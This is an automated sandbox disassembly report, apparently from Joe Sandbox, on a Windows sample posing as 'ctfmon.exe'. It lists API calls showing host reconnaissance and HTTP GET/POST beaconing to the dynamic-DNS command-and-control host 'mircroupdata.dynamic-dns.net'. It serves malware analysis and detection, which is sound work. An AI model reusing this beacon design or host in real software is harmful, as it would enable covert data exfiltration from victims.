Instruction Fuzzy Hash: 1F218B22101206E6DB31AB358CC5B6B66589F507A5F241B3FBC06B32C2DB3DCD4199AC

Function 00415D61 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D8D
GetStringTypeA.KERNEL32(@,00000100,?,?,?,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415DF8

Strings

@, xrefs: 00415DCD, 00415DF7

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide
String ID: @
API String ID: 3139900361-216407459
Opcode ID: 0894872d51583d29e9f411928d0752d51c31d1bf5a6ee4355dc6dfac94347f61
Instruction ID: c75d9d2e149fe478884894de742f27978b31c81d622bbf0292b479ae06dd18f0
Opcode Fuzzy Hash: 0894872d51583d29e9f411928d0752d51c31d1bf5a6ee4355dc6dfac94347f61
Instruction Fuzzy Hash: 20217F31D0070AEBCF218F98EC459DEBBB5FF88314F20851AE55077290D3759A95DB54

Function 00416D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00416871,?), ref: 00416D5A
GetStringTypeW.KERNEL32(?,?,00000000,qhA,?,?,?,?,?,?,00416871,?), ref: 00416D6C

Strings

qhA, xrefs: 00416D64

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide
String ID: qhA
API String ID: 3139900361-109923292
Opcode ID: 90facd2c636960555e395354108c39abe314cbde9bea42ad8a5fe578146252ea
Instruction ID: 89e0a92cda9d94ff151431ccce99fae9d9c15686a517ecb08ba51b8be8b920dd
Opcode Fuzzy Hash: 90facd2c636960555e395354108c39abe314cbde9bea42ad8a5fe578146252ea
Instruction Fuzzy Hash: ABF0FE32A01559EFCF218FD0ED859EEBF72FB04364F114625FA11611A0C7358961DB95

Function 0041DC70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23stringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000010), ref: 0041DC8E
lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 0041DC9E

Strings

ComboBox, xrefs: 0041DC98

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ClassNamelstrcmp
String ID: ComboBox
API String ID: 3770760073-1152790111
Opcode ID: 42d2bba44a04ed7f1c275f7866e4d06977ae23231fb73cfe7ca8ff7cb1aa41ff
Instruction ID: 49f8500e78018a632b0791ce0c797fe6f4d891fdbedeabdab1c9b0ad4b943904
Opcode Fuzzy Hash: 42d2bba44a04ed7f1c275f7866e4d06977ae23231fb73cfe7ca8ff7cb1aa41ff
Instruction Fuzzy Hash: D9E0DFB0B002006BD724AB248C49AAA32E8F754701FD40D5CF108C11A1FBBAD589CB9A

Function 00428B13 Relevance: 5.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00428B70
LeaveCriticalSection.KERNEL32(?,?), ref: 00428B80
LocalFree.KERNEL32(?), ref: 00428B89
TlsSetValue.KERNEL32(?,00000000), ref: 00428B9F

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 7f312700d13023db20b8708b1166f6760c5c2e3e6c00427aca0f9f7ae2b7f223
Instruction ID: 44b9a5697ca3fe7116b24a0973f7addb02f1af333081b1e9ede574ef100a776b
Opcode Fuzzy Hash: 7f312700d13023db20b8708b1166f6760c5c2e3e6c00427aca0f9f7ae2b7f223
Instruction Fuzzy Hash: 13218931302220EFD7208F45E885B6E7BA4FF45712F50806EF5029B2A2CBB5F842CB58

Function 004133E9 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,004131B1,00000000,00000000,00000000,0040E198,00000000,00000000,?,00000000,00000000,00000000), ref: 00413411
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,004131B1,00000000,00000000,00000000,0040E198,00000000,00000000,?,00000000,00000000,00000000), ref: 00413445
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0041345F
HeapFree.KERNEL32(00000000,?), ref: 00413476

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: fa750299313090193e105ebe2008919bf1dd0b0b930b10b5f1b3f69a44cfefeb
Instruction ID: c5f407516b639af01f7cf3b5c3ec23f839086e4030b11980835d7e942e3d2777
Opcode Fuzzy Hash: fa750299313090193e105ebe2008919bf1dd0b0b930b10b5f1b3f69a44cfefeb
Instruction Fuzzy Hash: 65118230600601DFD7318F69EC499567BB5FFA57157604A2AF1A1CA2B0C771A88EDF44

Function 00428F39 Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0053F3C8,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F74
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F86
LeaveCriticalSection.KERNEL32(0053F3C8,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F8F
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419,004203C5), ref: 00428FA1

Part of subcall function 00428EA6: GetVersion.KERNEL32(?,00428F49,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419,004203C5,0042601F), ref: 00428EB9

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 7a3532099ff2bfc6a1059ac9601c8184679287ed949954b4d6ae466d6c0a7985
Instruction ID: 78c625607d6fa9dd441586049681e252a915402f59230de00c6089102d7b9ab4
Opcode Fuzzy Hash: 7a3532099ff2bfc6a1059ac9601c8184679287ed949954b4d6ae466d6c0a7985
Instruction Fuzzy Hash: 67F04471A0121ADFC7209F54FCC499AB76DFB24356B81043BE605D3221DB35A459DFA8

Function 00412554 Relevance: 5.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412561
InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412569
InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412571
InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412579

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: eb9a2a7dc00640b2fa42e9378dbc490331b9edf8d292a26b3731d10b125d55d1
Instruction ID: c31dbd3ccd9fd40a20c5e7c4c7202aa3fbdad9c40b9ff82e0d969961f7efeac2
Opcode Fuzzy Hash: eb9a2a7dc00640b2fa42e9378dbc490331b9edf8d292a26b3731d10b125d55d1
Instruction Fuzzy Hash: A4C04031901074DBCF533B65FD4784D3FA6EF052603012273E144514308AB11D21DFC8

Analysis Process: ctfmon.exePID: 5024, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	33

Executed Functions

Function 00403550 Relevance: 3.1, APIs: 2, Instructions: 61COMMON

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI ref: 00403563
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00403586

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: 6bbeaa26c9763f4250eb1d384f51f38419e531e379e69b77f3a02d484a0ccf89
Instruction ID: 6b7a8a9e45624f5e4ac54a2b774ff4b4d77386f4916c747b8fc9f6bd6b467c43
Opcode Fuzzy Hash: 6bbeaa26c9763f4250eb1d384f51f38419e531e379e69b77f3a02d484a0ccf89
Instruction Fuzzy Hash: F911C6B16003046BDB14EE629CC196B77DCEBC4715F04493EF9099B286EB39ED098766

Function 004014B0 Relevance: 247.4, APIs: 41, Strings: 100, Instructions: 635
networkmemorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00080000,00001000,00000004), ref: 0040150F
WSAStartup.WS2_32(00000202,?), ref: 00401522
LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040152D
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040153F
FreeLibrary.KERNEL32(00000000), ref: 0040154B
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C17
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C2B
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C3F
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C53
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C67
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C7B
CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGH), ref: 00401C97
SetEvent.KERNEL32(00000000), ref: 00401C9F
CreateEventW.KERNEL32(00000000,00000001,00000001,fsdf++_[)**huahj6po1klHGHSENDDATAPARA), ref: 00401CAF
CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend), ref: 00401CBF
CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet), ref: 00401CCF
CreateEventW.KERNEL32(00000000,00000001,00000001,fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost), ref: 00401CE0
CreateEventW.KERNEL32(00000000,00000000,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001), ref: 00401CEF
CreateEventW.KERNEL32(00000000,00000000,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002), ref: 00401CFE

Part of subcall function 00405040: GetCommandLineW.KERNEL32(76232F60), ref: 00405068

Part of subcall function 00403190: GetComputerNameW.KERNEL32(?), ref: 00403223
Part of subcall function 00403190: gethostname.WS2_32(?,00000100), ref: 0040325F
Part of subcall function 00403190: gethostbyname.WS2_32(?), ref: 0040326D

Part of subcall function 00403D20: GetLogicalDrives.KERNEL32 ref: 00403D25
Part of subcall function 00403D20: GetDriveTypeA.KERNEL32(?), ref: 00403D7E

CreateThread.KERNEL32(00000000,00000000,Function_00003C80,00000000,00000000,00000000), ref: 00401D64
CreateThread.KERNEL32(00000000,00000000,Function_00004150,00000000,00000000,00000000), ref: 00401D70
CreateThread.KERNEL32(00000000,00000000,Function_00001130,00000000,00000000,00000000), ref: 00401D7C
CreateThread.KERNEL32 ref: 00401D99
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1),00000000,00000000,00000000,00000000), ref: 00401DB7
Sleep.KERNEL32(00001388), ref: 00401DC8
InternetConnectA.WININET(00000000,mircroupdata.dynamic-dns.net,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00401DE2
InternetCloseHandle.WININET(00000000), ref: 00401DEF
Sleep.KERNEL32(00001388), ref: 00401DF6
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,84400100,00000002), ref: 00401E19
InternetCloseHandle.WININET(00000000), ref: 00401E26
InternetCloseHandle.WININET(00000000), ref: 00401E29
Sleep.KERNEL32(00001388), ref: 00401E30
InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 00401E48
Sleep.KERNEL32(0000000A), ref: 00401E69
WaitForSingleObject.KERNEL32(00000344,000000FF), ref: 00401E78
ResetEvent.KERNEL32(00000340), ref: 00401E85
HttpAddRequestHeadersA.WININET(00000000,?,?,A0000000), ref: 00401F0E
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401F1D
InternetReadFile.WININET(00000000,?,00080000,?), ref: 00401F45
GetLastError.KERNEL32(?,A0000000,?,?,?,?,00000000,00000000,Function_00002BA0,00000000,00000000,00000000), ref: 00401F5E
SetEvent.KERNEL32(00000340,?,A0000000,?,?,?,?,00000000,00000000,Function_00002BA0,00000000,00000000,00000000), ref: 00401F6B

Strings

#, xrefs: 004019FA
Q, xrefs: 004015D1
9, xrefs: 00401662
a, xrefs: 00401587
a, xrefs: 00401A5F
`, xrefs: 00401AAD
V, xrefs: 00401934
h, xrefs: 00401A47
t, xrefs: 004019F2
:, xrefs: 0040176F
PTPM, xrefs: 00401F7D
fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost, xrefs: 00401CD1
], xrefs: 00401889
@, xrefs: 004018A9
^, xrefs: 00401881
3, xrefs: 0040180B
P, xrefs: 004015D6
L, xrefs: 00401A7F
P, xrefs: 0040192C
fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002, xrefs: 00401CF1
fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet, xrefs: 00401CC1
B, xrefs: 00401620
O, xrefs: 004017BD
L, xrefs: 00401650
675052, xrefs: 00401D0F
L, xrefs: 00401BD3
H, xrefs: 00401831
t, xrefs: 00401A1A
Q, xrefs: 00401924
\, xrefs: 004018CE
P, xrefs: 00401683
Kernel32.dll, xrefs: 00401528
#, xrefs: 00401B51
fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend, xrefs: 00401CB1
H, xrefs: 00401914
|, xrefs: 00401963
d, xrefs: 00401839
_, xrefs: 0040177F
P, xrefs: 004016C5
X, xrefs: 00401BBD
R, xrefs: 00401B59
Y, xrefs: 00401871
Q, xrefs: 00401BF2
fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001, xrefs: 00401CE2
T, xrefs: 00401905
L, xrefs: 00401822
P, xrefs: 00401707
p, xrefs: 00401A12
mircroupdata.dynamic-dns.net, xrefs: 00401DDC
X, xrefs: 0040157D
*, xrefs: 00401B3A
4, xrefs: 0040169B
5, xrefs: 0040162A
k, xrefs: 00401B96
N, xrefs: 00401777
H, xrefs: 004015C7
_, xrefs: 00401879
T, xrefs: 00401B1B
B, xrefs: 00401ACC
L, xrefs: 004017CD
H, xrefs: 004018DD
d, xrefs: 00401972
P, xrefs: 00401641
\, xrefs: 00401761
R, xrefs: 0040191C
item.asp?spm=xx{}:>*()_!, xrefs: 004014BF
|, xrefs: 00401603
, xrefs: 0040160C
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), xrefs: 00401DB0
[, xrefs: 00401891
@, xrefs: 00401B2A
Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+, xrefs: 00401EDE
', xrefs: 004019EA
d, xrefs: 004019C2
h, xrefs: 00401B32
GetNativeSystemInfo, xrefs: 00401539
X, xrefs: 0040171F
a, xrefs: 004019CA
j, xrefs: 004018ED
Q, xrefs: 00401ABD
X, xrefs: 00401A3F
L, xrefs: 00401716
fsdf++_[)**huahj6po1klHGH, xrefs: 00401C83
L, xrefs: 004016D4
`, xrefs: 00401BE2
j, xrefs: 0040156E
L, xrefs: 00401758
L, xrefs: 00401692
P, xrefs: 00401BEA
GET, xrefs: 00401E13
R, xrefs: 004015EA
+, xrefs: 004016A4
P, xrefs: 00401A6F
+, xrefs: 00401A9E
h, xrefs: 00401578
h, xrefs: 00401A96
fsdf++_[)**huahj6po1klHGHSENDDATAPARA, xrefs: 00401CA5
P, xrefs: 00401749
P, xrefs: 0040179D
`, xrefs: 004017DC

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Create$Event$AllocInternetVirtual$SleepThread$CloseHandleHttpRequest$LibraryOpen$AddressCommandComputerConnectDriveDrivesErrorFileFreeHeadersLastLineLoadLogicalNameObjectOptionProcReadResetSendSingleStartupTypeWaitgethostbynamegethostname
String ID: $#$#$'$*$+$+$3$4$5$675052$9$:$@$@$B$B$GET$GetNativeSystemInfo$H$H$H$H$Kernel32.dll$L$L$L$L$L$L$L$L$L$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$N$O$P$P$P$P$P$P$P$P$P$P$PTPM$Q$Q$Q$Q$R$R$R$Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+$T$T$V$X$X$X$X$Y$[$\$\$]$^$_$_$`$`$`$a$a$a$d$d$d$fsdf++_[)**huahj6po1klHGH$fsdf++_[)**huahj6po1klHGHSENDDATAPARA$fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001$fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002$fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet$fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost$fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend$h$h$h$h$item.asp?spm=xx{}:>*()_!$j$j$k$mircroupdata.dynamic-dns.net$p$t$t$|$|
API String ID: 532994470-3063579737
Opcode ID: 7ab0d9eef510a3772e120244943042c5d8440bc05c794fce203168c27190420c
Instruction ID: bf1a022c60407e02be0dd9bd1b531f7c38c72e15a62a5c9b7b3f82dbccb0f244
Opcode Fuzzy Hash: 7ab0d9eef510a3772e120244943042c5d8440bc05c794fce203168c27190420c
Instruction Fuzzy Hash: 7D62482010C7C5D9E332C7788849B8FBED55BA7324F484A9DF1E86B2D2C6B95109C76B

Function 00402BA0 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 275
networksleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1),00000000,00000000,00000000,00000000), ref: 00402C18
Sleep.KERNEL32(00001388), ref: 00402C2C
InternetConnectA.WININET(00000000,mircroupdata.dynamic-dns.net,00000050,00000000,00000000,00000003,00000000,00000003), ref: 00402C42
InternetCloseHandle.WININET(00CC0008), ref: 00402C53
Sleep.KERNEL32(00001388), ref: 00402C5A
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,84400100,00000004), ref: 00402C76
InternetCloseHandle.WININET(00CC000C), ref: 00402C88
InternetCloseHandle.WININET(00CC0008), ref: 00402C90
Sleep.KERNEL32(00001388), ref: 00402C97
InternetSetOptionA.WININET(00000000,00000005,0000000A,00000004), ref: 00402CA8
ResetEvent.KERNEL32(0000033C), ref: 00402CB5
WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 00402CCF
WaitForSingleObject.KERNEL32(00000340,000000FF), ref: 00402CDA
ResetEvent.KERNEL32(00000344), ref: 00402CE3
SetEvent.KERNEL32(00000338,?,A0000000,?,?,A0000000), ref: 00402CFB
SetEvent.KERNEL32(00000338), ref: 00402D13
HttpAddRequestHeadersA.WININET(00CC0010,?,?,A0000000), ref: 00402D9A
HttpAddRequestHeadersA.WININET(00CC0010,?,?,A0000000), ref: 00402E95
HttpSendRequestA.WININET(00CC0010,00000000,00000000,004BC7C4,00000000), ref: 00402EAE
InternetReadFile.WININET(00CC0010,0043C7C4,000186A0,?), ref: 00402ED4
GetLastError.KERNEL32(?,A0000000,?,?,A0000000), ref: 00402EEA
SetEvent.KERNEL32(00000344,?,A0000000,?,?,A0000000), ref: 00402F05
ResetEvent.KERNEL32(0000033C,?,A0000000,?,?,A0000000), ref: 00402F12

Strings

Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+, xrefs: 00402D64
POST, xrefs: 00402C70
PTPM, xrefs: 00402DA1
item.asp?spm=xx{}:>*()_!, xrefs: 00402BAF
Content-Length: %u, xrefs: 00402E66
mircroupdata.dynamic-dns.net, xrefs: 00402C3C
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), xrefs: 00402C13

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Internet$Event$HttpRequest$CloseHandleResetSleep$HeadersObjectOpenSingleWait$ConnectErrorFileLastOptionReadSend
String ID: Content-Length: %u$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$POST$PTPM$Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+$item.asp?spm=xx{}:>*()_!$mircroupdata.dynamic-dns.net
API String ID: 3227742456-1989333268
Opcode ID: 6b158de987f37018d3f3aedb66c614430a0e078141529bb07d86292ec45833a3
Instruction ID: 5521d0e7914338b547ae66bed9a7008d46125a5347177c733f9cd849099ed627
Opcode Fuzzy Hash: 6b158de987f37018d3f3aedb66c614430a0e078141529bb07d86292ec45833a3
Instruction Fuzzy Hash: 3291E672740302ABD714DB64EC85F2B3BA9EB98B00F50452DF905B73D1DBB8E8059B69

Function 00403190 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 276
networktimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32(?), ref: 00403223
gethostname.WS2_32(?,00000100), ref: 0040325F
gethostbyname.WS2_32(?), ref: 0040326D
timeGetTime.WINMM ref: 004032FD
GetVersionExW.KERNEL32(?), ref: 00403393
GetVersionExW.KERNEL32(0000011C), ref: 004033A6

Strings

%3dD:%2dH:%2dM, xrefs: 00403346
Windows Server 2008, xrefs: 0040343C
Windows Server 2012, xrefs: 004033E1
SP%d, xrefs: 00403508
Windows Server 2003, xrefs: 0040349A
Windows 8, xrefs: 004033D7
Windows XP Professional x64, xrefs: 004034B1
Windows Vista, xrefs: 00403432
Windows XP, xrefs: 004034C3
